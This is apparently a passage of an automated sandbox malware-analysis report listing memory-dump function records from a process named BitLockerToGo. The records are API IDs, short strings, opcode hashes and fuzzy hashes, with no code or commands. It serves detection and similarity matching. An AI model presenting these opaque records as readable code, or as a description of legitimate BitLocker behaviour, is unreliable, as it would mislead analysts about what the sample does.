                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 2994545307-2222620526
                                                                                    • Opcode ID: 60381cf5c24a8d4759631cef9cffb6af330fb3cce93a0978c928fc436f60f342
                                                                                    • Instruction ID: 6d182deb88c2c4eb255f3f6f371a54bc81061c6ec6ac901c292e8a6fabbb1aac
                                                                                    • Opcode Fuzzy Hash: 60381cf5c24a8d4759631cef9cffb6af330fb3cce93a0978c928fc436f60f342
                                                                                    • Instruction Fuzzy Hash: F301D83034C2105FDB548B10D98187B7369EB5A75CF61661DF06623576C3749C078B5D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $(Ca
                                                                                    • API String ID: 0-3651910949
                                                                                    • Opcode ID: f3dc78d55f9b7432d2cfe76f020a771e01dd59afd2f47eff987ab0c26e84f887
                                                                                    • Instruction ID: a54c174fe026b402a79ebbd94ae73bc0dd6676e717bfd306ef8db5c792464231
                                                                                    • Opcode Fuzzy Hash: f3dc78d55f9b7432d2cfe76f020a771e01dd59afd2f47eff987ab0c26e84f887
                                                                                    • Instruction Fuzzy Hash: 7C1131301083819BCB199B25C811BBABBE09F97304F18486DF0D2D32E3DB398446C79A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: e73a60594a34896f126e9e1d7372bd15978939b8c7b289373e8439afa795e774
                                                                                    • Instruction ID: aedfb67314d9ebe2d71852c7ac7ec84794d1d19aed1dc7c2685d9c11a788c456
                                                                                    • Opcode Fuzzy Hash: e73a60594a34896f126e9e1d7372bd15978939b8c7b289373e8439afa795e774
                                                                                    • Instruction Fuzzy Hash: 7201A1357182109BD7488F64B44043BB3B2EFD6725F95696CE88263211C336ED42CB8D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: 6c572baec16290f9058c09b241c1d7d46c3f91507620d49c45c0cfc9c7b8572b
                                                                                    • Instruction ID: f6be957a4c6912d3bf47c9c5fa08e1818c84933d3de460471f0cc8570821c659
                                                                                    • Opcode Fuzzy Hash: 6c572baec16290f9058c09b241c1d7d46c3f91507620d49c45c0cfc9c7b8572b
                                                                                    • Instruction Fuzzy Hash: E1018C3870C2009BD7048F10E89143BB7B2EF92718FA5A57DE88627212C774DC028BAE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: nt
                                                                                    • API String ID: 0-3989823987
                                                                                    • Opcode ID: 8f23375f3ded1cedf8c2b6c586e19495486d9110ee2f26202b7f1334f42557fb
                                                                                    • Instruction ID: 9a8167d43ed3aa6e80a9fffa86108335d32d45ce1e36d09d358efee2e21b3ab1
                                                                                    • Opcode Fuzzy Hash: 8f23375f3ded1cedf8c2b6c586e19495486d9110ee2f26202b7f1334f42557fb
                                                                                    • Instruction Fuzzy Hash: FA114876E163911BE314DB359C916EBB6E29B8A304F28853DD985D3382EA389811874A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DCBA
                                                                                    • API String ID: 0-2222620526
                                                                                    • Opcode ID: c171ce8634b65f3b72ab00d7978cc057f42bfaa1f1ed53675fa34d6148c0a6de
                                                                                    • Instruction ID: 517883da41b6e9bbcf1a327f50b4d8fcb30acbe5f397202542f823fa7dde89d0
                                                                                    • Opcode Fuzzy Hash: c171ce8634b65f3b72ab00d7978cc057f42bfaa1f1ed53675fa34d6148c0a6de
                                                                                    • Instruction Fuzzy Hash: 7BF0A73074C3104FD7548B20A19013BB3A1EB6F758F616A6DD0A667666C335C8078F9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f6058685706a4b9884b74908391a19c10f0b4d6fdd3ae6168e92701922a9f3f
                                                                                    • Instruction ID: 5ceb4989b1b86f645277271506dccbfdfc38913f66a9b4bce4754ff2b505bc7e
                                                                                    • Opcode Fuzzy Hash: 2f6058685706a4b9884b74908391a19c10f0b4d6fdd3ae6168e92701922a9f3f
                                                                                    • Instruction Fuzzy Hash: 6B52D270A08B849FE730DB24C4843A7BBE1AB91314F15893ED5E7267C2C37DA995C71A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e462e2d2b4d664232bddda86f707e6d7dfd7b7d18630e8fe4ab93a725646434
                                                                                    • Instruction ID: 1fdbdd34fcc77c32b79dab7dd7279ebfb464f3e9845fc9dd6af1f60592f44fed
                                                                                    • Opcode Fuzzy Hash: 3e462e2d2b4d664232bddda86f707e6d7dfd7b7d18630e8fe4ab93a725646434
                                                                                    • Instruction Fuzzy Hash: 4D52F5715083458FCB15CF28C0906AABFE1BF89315F18867EF89967381D778E949CB89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7431acdf2bb0df9f5d64ac42b9b2a79ca823d03e3cbbd7ec7a0b21da91d18a0
                                                                                    • Instruction ID: 16be905699757f58d08162ad6942cc9dbbe75419bc267803a287b0f1a35843ed
                                                                                    • Opcode Fuzzy Hash: d7431acdf2bb0df9f5d64ac42b9b2a79ca823d03e3cbbd7ec7a0b21da91d18a0
                                                                                    • Instruction Fuzzy Hash: BC12B472A087118BC725DF18D8806ABB3E1BFC4315F19893ED9C6A7385D738B8558B87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ddb25166d6e40877f6ccc7991eb95f166459aab1e500651e052a739ec97d630
                                                                                    • Instruction ID: fcbb075d82800fa21d99395b30d46dcba7733093782d6adb3d4b01ac132fc4ef
                                                                                    • Opcode Fuzzy Hash: 1ddb25166d6e40877f6ccc7991eb95f166459aab1e500651e052a739ec97d630
                                                                                    • Instruction Fuzzy Hash: 94322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5c20ee7d1fd3c2e695e38734b33f15da7c2f123df62230dcde53f4cf05a35178
                                                                                    • Instruction ID: b3da4d7c7a96eb8050c9bb065d93e430765124b9399a5d3bdf25a4dde5708ecb
                                                                                    • Opcode Fuzzy Hash: 5c20ee7d1fd3c2e695e38734b33f15da7c2f123df62230dcde53f4cf05a35178
                                                                                    • Instruction Fuzzy Hash: 96426CB0209B818ED335CB3C8815797BFE56B5A324F488A9DE0FA873D2C7756005CB66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                    • Instruction ID: 02d2229be3a83fbc5474e3e6ea086dcca113fe43498424369727b2d08b453b9d
                                                                                    • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                    • Instruction Fuzzy Hash: 30F1BE756087418FD724CF29C88076BBBE2EFD9304F08882DE5D997391E639E944CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 47bdd86f9149c78e8931a02de7ed9d56138aef0559dfde390388fb0a4284f46e
                                                                                    • Instruction ID: 2d32b6a3528814d4c24523c73119158def0aab2ae49429046858fb794448a504
                                                                                    • Opcode Fuzzy Hash: 47bdd86f9149c78e8931a02de7ed9d56138aef0559dfde390388fb0a4284f46e
                                                                                    • Instruction Fuzzy Hash: 03B12675904300BFDB109F24DC81B5ABBE2FFD4358F148A2EF498932A1E7369D568B46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 2b4fb4a0d1b697f84d3669f7b0098d7e02f4f4742a568c657743ca0c137fdaee
                                                                                    • Instruction ID: 74d931ab855a48af746ba0e3dc3892a10fca20c4ecf4284ffac6787a2b03bbec
                                                                                    • Opcode Fuzzy Hash: 2b4fb4a0d1b697f84d3669f7b0098d7e02f4f4742a568c657743ca0c137fdaee
                                                                                    • Instruction Fuzzy Hash: 229103356083519BC728DF28D8D1A2BB3E2FF8C300F15A92DE986AB355DB75AC41C785
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5605cae5b1bda8ad3a4cf5cb71b2aea22018d0d7e53cffc64163186733435116
                                                                                    • Instruction ID: eb4bfc3efdb46786f2e6bebf935458a3fcec0c4f1143b4373b6fc09339c11b48
                                                                                    • Opcode Fuzzy Hash: 5605cae5b1bda8ad3a4cf5cb71b2aea22018d0d7e53cffc64163186733435116
                                                                                    • Instruction Fuzzy Hash: B0C15D729487418FC360CF28DC867ABB7E1BF85318F09492DD1DAD6342D778A155CB46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8f08d3bf843c8cc81cd410b94f476b274efa18dc9aab804fa5c474ce87c232ad
                                                                                    • Instruction ID: c07933878babe71f3ccc4ba8684601a0ec1b95e7ac8a20c0172c4066b999b2d0
                                                                                    • Opcode Fuzzy Hash: 8f08d3bf843c8cc81cd410b94f476b274efa18dc9aab804fa5c474ce87c232ad
                                                                                    • Instruction Fuzzy Hash: 8681E1352083029BD724DF28C891A2BB3E2FFC9710F15A52DE9859B351EB34EC51CB89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d51b7f19852cb98f9319ef847b503ad5ee0d04e85e6670b6974c824828583a6e
                                                                                    • Instruction ID: 21f4277e489b25c4b6297c542707cfb0cb85732d2b39f996b935debf0f516e07
                                                                                    • Opcode Fuzzy Hash: d51b7f19852cb98f9319ef847b503ad5ee0d04e85e6670b6974c824828583a6e
                                                                                    • Instruction Fuzzy Hash: D9B14F31A087918FC715CA7CC8457EE7FA29B9B220F1D839DD4A69B3D2C529A807C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee99c97f6f89cf30c3feef9581b9004457b133a689d45e6388639d76d7a6940e
                                                                                    • Instruction ID: 14eed3b193b92f7bd7c91c1a12cb5a7423ebfd5753331b59b2878284fe61ec2b
                                                                                    • Opcode Fuzzy Hash: ee99c97f6f89cf30c3feef9581b9004457b133a689d45e6388639d76d7a6940e
                                                                                    • Instruction Fuzzy Hash: F971053124C3C28AD3119F7984903ABFFE0AFA2304F08597DE4D49B386D7798919D766
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18dc34ae9a606a1da8fb6243ebac13852137b570fb580b94def7ef54e059c2e7
                                                                                    • Instruction ID: 321a41b0e24768df93993f45ec39ff26ec6abcd782719345d1c535d6020f9ee2
                                                                                    • Opcode Fuzzy Hash: 18dc34ae9a606a1da8fb6243ebac13852137b570fb580b94def7ef54e059c2e7
                                                                                    • Instruction Fuzzy Hash: FE715622B59AF14BC318593D5C212AABA834FD6334FADC37EA9F18B3E1D5598C068345
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a59191fe466e87ea392e17c001d7f114284416eb859047ee4e189d9d42fcda35
                                                                                    • Instruction ID: 7a38c4d14191e423d518bcd012fcfe6135c3ceb1f89b606c91b16954ab462f1c
                                                                                    • Opcode Fuzzy Hash: a59191fe466e87ea392e17c001d7f114284416eb859047ee4e189d9d42fcda35
                                                                                    • Instruction Fuzzy Hash: 46712933B599A14B932C893C5C62266B9934BD72347AEC37FE5B1C73F5D96C480A8348
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 300e2a16f2aa471d5cf9c35f9543d1f41723d5b77572bb696f02dc22411e4e29
                                                                                    • Instruction ID: fafc8b41128148528121a67710092d43837a77869dcd5a4b7325ff8bb9b2a2ab
                                                                                    • Opcode Fuzzy Hash: 300e2a16f2aa471d5cf9c35f9543d1f41723d5b77572bb696f02dc22411e4e29
                                                                                    • Instruction Fuzzy Hash: 22610A73F4958047E328893C4C512AABA934FD2234F2DC7BEE9F5873E5C56988458346
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a2354b7e78736bff6752e317a600d56ae2db8798d09994f5bf9b8b57d6477927
                                                                                    • Instruction ID: 14fdeba948a93b3c53f68ce45ab72a6c3727f090b9ad8d9c7f5e46addf120586
                                                                                    • Opcode Fuzzy Hash: a2354b7e78736bff6752e317a600d56ae2db8798d09994f5bf9b8b57d6477927
                                                                                    • Instruction Fuzzy Hash: D551BC7420C3118BC714DF24D86266BB7F1EF82724F44991DE4D59B3A1E338D905DB5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c4fdf97a2f1a179d9e674d41816b876a5a1ec115cd740e6f1111616f76577ff
                                                                                    • Instruction ID: 790f180e8d4a6f5c1ef5855a9cf66029b52f87d90570feadd83e32b30a7b9a35
                                                                                    • Opcode Fuzzy Hash: 1c4fdf97a2f1a179d9e674d41816b876a5a1ec115cd740e6f1111616f76577ff
                                                                                    • Instruction Fuzzy Hash: 8471C77160C3428FD715CF28C49062EBBE2AFC9314F188AAEE8D58B392D675DC41CB56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d4fed3f0ba83135604789746c5e92f042240db01558bdd2702fb766c9ccdb92
                                                                                    • Instruction ID: 804195c8b1f9a977300dfb6ed4e56dd22b4087539773d87b635c909f9b7ebc4a
                                                                                    • Opcode Fuzzy Hash: 7d4fed3f0ba83135604789746c5e92f042240db01558bdd2702fb766c9ccdb92
                                                                                    • Instruction Fuzzy Hash: 2F51E473F159808BD7188D3D8C112EA6A531BE7334B3E837B99B58B3E5C62A8C468355
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cc8c0ecc0da0eced31d3500927d73d3a40b888f2ec8c29f7fef54cba9e22d4b6
                                                                                    • Instruction ID: cb991a55680070318c7d0b3c79711b513c51a95225e1ecc1281be0889af13ba2
                                                                                    • Opcode Fuzzy Hash: cc8c0ecc0da0eced31d3500927d73d3a40b888f2ec8c29f7fef54cba9e22d4b6
                                                                                    • Instruction Fuzzy Hash: 07513833A6A9814BE328893C4C502EA7A930BD3330F3DC77AD5B4873E4D5698C97435A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 74f69f23d04b8d3363161613e04029a9dd53a912bd554f0e8a5a3837446c2789
                                                                                    • Instruction ID: 926b0f658338236115fec19bad7f90239f3caae2bc3b57b709916a7c7eb54a4e
                                                                                    • Opcode Fuzzy Hash: 74f69f23d04b8d3363161613e04029a9dd53a912bd554f0e8a5a3837446c2789
                                                                                    • Instruction Fuzzy Hash: 4961E0B1A413669FDB44CF68DC82A9ABF30FB06310B1542A9E450AF352C734C442CFD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e168b79f61548e1623c39d89a8750a3322975b5e6821bc4d28b4c5b4afa9f4b
                                                                                    • Instruction ID: 4b721b9351200411affedd0fe1460c26ece020c84106155a22f403e348d89d81
                                                                                    • Opcode Fuzzy Hash: 1e168b79f61548e1623c39d89a8750a3322975b5e6821bc4d28b4c5b4afa9f4b
                                                                                    • Instruction Fuzzy Hash: 05517DB15087548FE314DF69D49435BBBE1BBC8318F044A2EE4E987350E379DA088F86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b3c75c708d9c2eb232c2878fcfd7121cd9994fe1ff6eac5a4affbb7310c2ad84
                                                                                    • Instruction ID: 3219bdbc90bf553ba409493bccfc3ce243fda83e1ac63137579968e9d462d64e
                                                                                    • Opcode Fuzzy Hash: b3c75c708d9c2eb232c2878fcfd7121cd9994fe1ff6eac5a4affbb7310c2ad84
                                                                                    • Instruction Fuzzy Hash: 04512773E187350BC714CE289C9021AB2D2ABC4214F5B867DDDA99B386EA34EC05C7C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f6a177ef1093b82863d6bdf4325194f686afbf03b595ab962e2a594d60901889
                                                                                    • Instruction ID: ffa4024d1fecf6a95fbfc38947bfe75a971755c75a06410646f70d773baaa8df
                                                                                    • Opcode Fuzzy Hash: f6a177ef1093b82863d6bdf4325194f686afbf03b595ab962e2a594d60901889
                                                                                    • Instruction Fuzzy Hash: 0F41E1B560C3048FC714EF65E84157BB7E2FBD9304F14957EE19683661DB3898428B8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                    • Instruction ID: 9a6b9e8a26fb0f3bc84429a8fb07d45c664269e9ebb10f82827b0a9ce94155c9
                                                                                    • Opcode Fuzzy Hash: 23b86555ce2a695d0511db9aff25f2c561b64c1b68d1782900c463b72642fbea
                                                                                    • Instruction Fuzzy Hash: C1410B32B0827147CB188E2D8D9417ABAD75FC5205F0EC63AFCC5AB7D6D578990097D4
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
• Opcode ID: 63772adff518944676ac6470e3648175ca610b2eefb1d204d6592b914da60d35
• Instruction ID: 2c40c0230266d8b2cfbe3e46dea91ec0ef3861f69abc0ad3f180c9264077abf0
• Opcode Fuzzy Hash: 63772adff518944676ac6470e3648175ca610b2eefb1d204d6592b914da60d35
• Instruction Fuzzy Hash: 4731D4B56083088FD314EF64E84167B77E2FBDA305F18947DE18593321E778D842968A